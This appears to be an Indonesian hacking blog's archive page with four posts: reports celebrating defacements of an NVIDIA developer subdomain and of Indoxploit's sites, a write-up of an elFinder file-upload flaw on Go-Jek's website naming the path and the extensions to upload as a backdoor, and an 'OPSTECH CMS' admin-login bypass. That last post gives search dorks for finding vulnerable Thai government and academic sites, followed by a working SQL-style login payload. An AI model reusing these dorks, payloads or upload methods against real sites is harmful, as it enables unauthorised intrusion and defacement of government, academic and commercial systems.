Showing posts with label website. Show all posts
Showing posts with label website. Show all posts
Friday, February 24, 2017
Website NVIDIA Got Hacked
Website NVIDIA Got Hacked

Nah pada hari ini 12/24/16 website NVIDIA di hack oleh salah satu hacker yang mempunyai nick Xaveroz_Tersakiti.
Xaveroz_Tersakiti meretas subdomain developer dari nvidia yang beralamat di developer.nvidia.com
Walaupun yang di retas bukan index halaman homepagenya. tetapi hal ini tidak bisa dianggap remeh oleh pengembang website nvidia. Dari celah yang kecil ini mungkin saja bisa merembet ke beberapa directory.
Entah mengapa sang hacker tidak meretas Halam depan atau homepagenya. " Mungkin Saja " akses directory di halaman depannya tidak writable. atau tidak bisa di akses atau tidak bisa di eksekusi.
Letak direktory yang dimasuki oleh Xaveroz_Tersakiti yaitu terletak di :
developer.nvidia.com/sites/default/files/webform/xaveroz.html
Di dalam script tersebut sang hacker meninggalkan sebuah pesan berikut ini :
PAWNED BY:
[#]Xaveroz_Tersakiti[#]
Message for Admin :
Sorry Admin !
Your Site Has Been Hacked System Security Is Low , Please Patch Your System.
This Is Just A Warning If You Still Dont want to patch it
We Will Keep On Hacking it.
Kemudian di bagian footer terdapat nickname hacker lainnya :
__________________________ __________________________
GrenXPaRTa - r00tkit404 - Jilan404 - Arthiz Cyber - Indonesia Defacer Tersakiti - DiffMuRis - ML7C - MalaysiaGov - Abrasax1337 - ./MR.ROB0T - fcod3x - Jiwa Tersesat - 0x1958 - Gboys_Flush CyberGhost.17 - Mr.Vendeta_404 - ZakirDotID - ins7ing - Mr.spongebob - Krypton - l0c4lh0st
Ketika kita mengunjungi developer.nvidia.com/sites/default/files/webform/
Disana terdapat sebuah tulisan seperti ini :
__ .__
___________ _____/ |_| |__ ____ ____ ____
____ __ / __ | _/ __ / _ /
| |_> > __ | | | | Y ___( <_> ) |
| __(____ /___| /__| |___| /___ >____/|___| /
|__| / / / / /
No site detected. Make sure your code is pulled into this environment.
Mungkin saja ini adalah penjaga security dari website nvidia tersebut :D
POC :
Dari keterangan yang didapat, sang hacker dapat masuk kedalam sistem website tersebut dengan metode Hidden Uploader
Mirror :
Dalam kasus peretasan ini kita tidak menemukan mirror nya di zone h dalam archive ataupun onhold.
Mungkin saja di mirrorkan dalam web mirrror lainnya
3xploi7 Team
Available link for download
Sunday, February 19, 2017
OPSTECH CMS Bypass Admin Login Thailand Gov Ac Website Vulnerable !
OPSTECH CMS Bypass Admin Login Thailand Gov Ac Website Vulnerable !

#- Author: unknown
#- Team : -
#- Team : -
#- Published : -
#- Developer : Opestech
#- Link : Opestech.co.th
#- Price : -
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --
Description :
Opestech merupakan developer website thailand yang melayani pembuatan website. Kebanyakan opestech melayani pembuatan website gov, ac dan website lainnya.
Vulnerability :
site /index.php?mod=login&path=user&/index.php?mod=login&path=login
Dork :
intext:Copyright © 2008 by OPSTECH
inurl:/index.php?mod=login&path=user
inurl:/index.php?mod=login&path=login
Method
1. Dorking & find your target
2. Target.com/exploit Ex : target .com/index.php?mod=login&path=user & /index.php?mod=login&path=login
3. Login as admin
Admin: = or | Password : = or
4. Done
Available link for download
Monday, February 6, 2017
Website Indoxploit di Hack !!
Website Indoxploit di Hack !!

Website Indoxploit di Hack !! - Indoxploit adalah sebuah Team Defacer Indonesia yang hebat dalam hal kodingannya yang membuat macam macam tools exploiter. Apakah kamu masih ingat dengan UnknownYmouz ? Yap, dia yang berhasil meretas situs toyota.
Baca Selengkapnya : Situs Toyota Kembali Di Hack !
Lagi lagi UnknownYmouz membuat geger dunia bawah tanah sebab, Pada tanggal 2016-06-28 website team defacer Indoxploit kena tested oleh UnknownYmouz . Tidak ada motif khusus dari serangan ini. UnknownYmouz hanya Tested saja, terlihat dari pesan yang disampaikannya yaitu : Just test min :u tidak bermaksud saling menjatuhkan :u
Website Indoxploit yang Homepagenya berupa portal halaman berubah seketika menjadi gelap. Dengan background berwarna hitam dengan Terdapat tulisan " Indonesian Code Party " kemudian di bagian tengahnya terdapat Foto kartu remi dan tidak lupa Terdapat Tulisan : " Hacked by UnknownYmouz " yang disertai dengan nama anggota dari team Indonesian Code Party.
Hacked by UnknownYmouz
# Indonesian Code Party #
$ ZeynnymouZ | ./BlaDDzeRR | UnknownYmouz | -DenJaka- | Consept_IXI | ./Coco | 0x1999 | Lock-Down | ./UnIX | ./L1ght_R00t | Walkers404
Greetz : FadliDotID_007 - ./KidSZonk - Kefiex404 - Malaikat_Galau - IndoXploit - Extreme Crew
Just test min :u tidak bermaksud saling menjatuhkan :u
CONTACT ME ( Menuju ke link fanpage Indonesian Code Party )
Ternyata UnknownYmouz juga meninggalkan pesan tersembunya yaitu :
" To Admin : Kindly Patch Your System Immediately !!! Salam, UnknownYmouz "

Pesan tersembunyi menggunakan javascript dan pesan tersebut dapat dilihat jika kamu menekan tombol CTRL
POC
Dari informasi yang kami dapat, UnknownYmouz dapat masuk ke website indoxploit karena terdapat sebuah uploader yang tidak aman & dapat menjadi " sarang lebah ".
Uploader tersebut terdapat didalam dir Autoexploiter milik team mereka. Itu merupakan sebuah insiden yang fatal menurut kami.
Informasi Tambahan
Ternyata tidak hanya website Indoxploit saja yang kena tested, Forum Indoxploit pun juga kena tested pada tanggal 2016-05-24. Forum Indoxploit kena tested oleh Shu1337. Yang sepertinya Shu1337 berasal dari team Indonesian Cyber Army / JKT 48 Cyber Team.
Terpampang disana nama nama dari team mereka :
onixaqua - erzajullian - i3r_cod3 - skeptix - bekasi0d0nk - vergos303 - barrabravaz - yuneroz
Mirror
indoxploit.or.id hacked. Notified by UnknownYmouz
Notified by: UnknownYmouz IP address: 94.100.31.218 ( Netherlands )
Domain: indoxploit.or.id
System: LinuxWeb
Server: LiteSpeed
Zone h :
http://www.zone-h.org/mirror/id/26460338
===
forum.indoxploit.or.id hacked. Notified by Shu1337
Domain: forum.indoxploit.or.id
IP address: 162.210.198.23 ( United States )
System: LinuxWeb
server: Apache
Zone h :
http://www.zone-h.org/mirror/id/26307138
Available link for download
Labels:
di,
hack,
indoxploit,
website
Friday, February 3, 2017
Bug Pada Website GO JEK Indonesia
Bug Pada Website GO JEK Indonesia

Bug Pada Website GO-JEK Indonesia - Go-Jek merupakan sebuah startup yang menggunakan teknologi sebagai modal utama untuk menjalankan bisnisnya. Kami rasa Go-jek sendiri pasti mempunyai banyak sekali team didalamnya, seperti team developer, design, marketing dan lain lain. dan kami yakin pastinya gojek juga mempunyai team security untuk menjaga keamanan teknologi yang dipakainya.
Memang Go-jek tidak sepenuhnya menggunakan websitenya untuk menjalankan kegiatanya. Gojek hanya menggunakan aplikasi pada android / ios / os lainnya. Tetapi tidak menutup kemungkinan apakah website gojek dibiarkan begitu saja ? Menurut kami website juga sangat penting walaupun tidak banyak digunakan tetapi paling tidak dijaga keamanannya untuk mengindari sesuatu yang fatal.
Ternyata website gojek mempunyai bug lohh..
mau tau ? Simak berikut ini
Bug Website GoJek
#- Author: Tidak dipastikan
#- Published : 7-17-2016
#- Developer : Team Go-Jek
#- Fixed in Version : -
#- Tested on : windows
========================================================================
Proof Of Concept
Vulnerability :
site.com/path/elfinder
Vuln Extension :
.php .php3 .php6 .txt .html .pl .htaccess .html .phtml .jpg .gif and anymore
Jenis Kerusakan :
Lumayan Tinggi ( Tergantung Webnya )
Metode Penyerangan :
Attacker dapat menyerang celah ini dengan mengupload backdoor dengan berbagai extension
Go-jek mempunyai bug kemanan pada websitenya. bug tersebut adalah bug yang sudah banyak digunakan oleh beberapa website didunia. Jadi kami tidak kaget lagi tentang bug itu. Bug itu adalah : elFinder 2.0 - file manager for web(rc1) - File Upload Vulnerability
Bug ini sudah lama ditemukan sekitar 2 tahun yang lalu.

Nampaknya go-jek sudah mengantisipasi hal berikut. Elfinder yang terdapat gojek ini sudah ditata sedimikian rupa sehingga para attacker hanya bisa mengupload beberapa file tetapi tidak bisa dapat mengeksekusi.
Tetapi tidak menutup kemungkinan mungkin ada attacker yang lebih lihai lagi. Bisa saja elfindernya dibypass kemudian attacker tersebut dapat masuk kedalam public html. Tentu hal ini bisa berakibat fatal bagi Go-jek
Reference : 0day .today/exploit/22381
Tetapi tidak menutup kemungkinan mungkin ada attacker yang lebih lihai lagi. Bisa saja elfindernya dibypass kemudian attacker tersebut dapat masuk kedalam public html. Tentu hal ini bisa berakibat fatal bagi Go-jek
Reference : 0day .today/exploit/22381
Solve
Patching
( Pic )

Available link for download
Subscribe to:
Posts (Atom)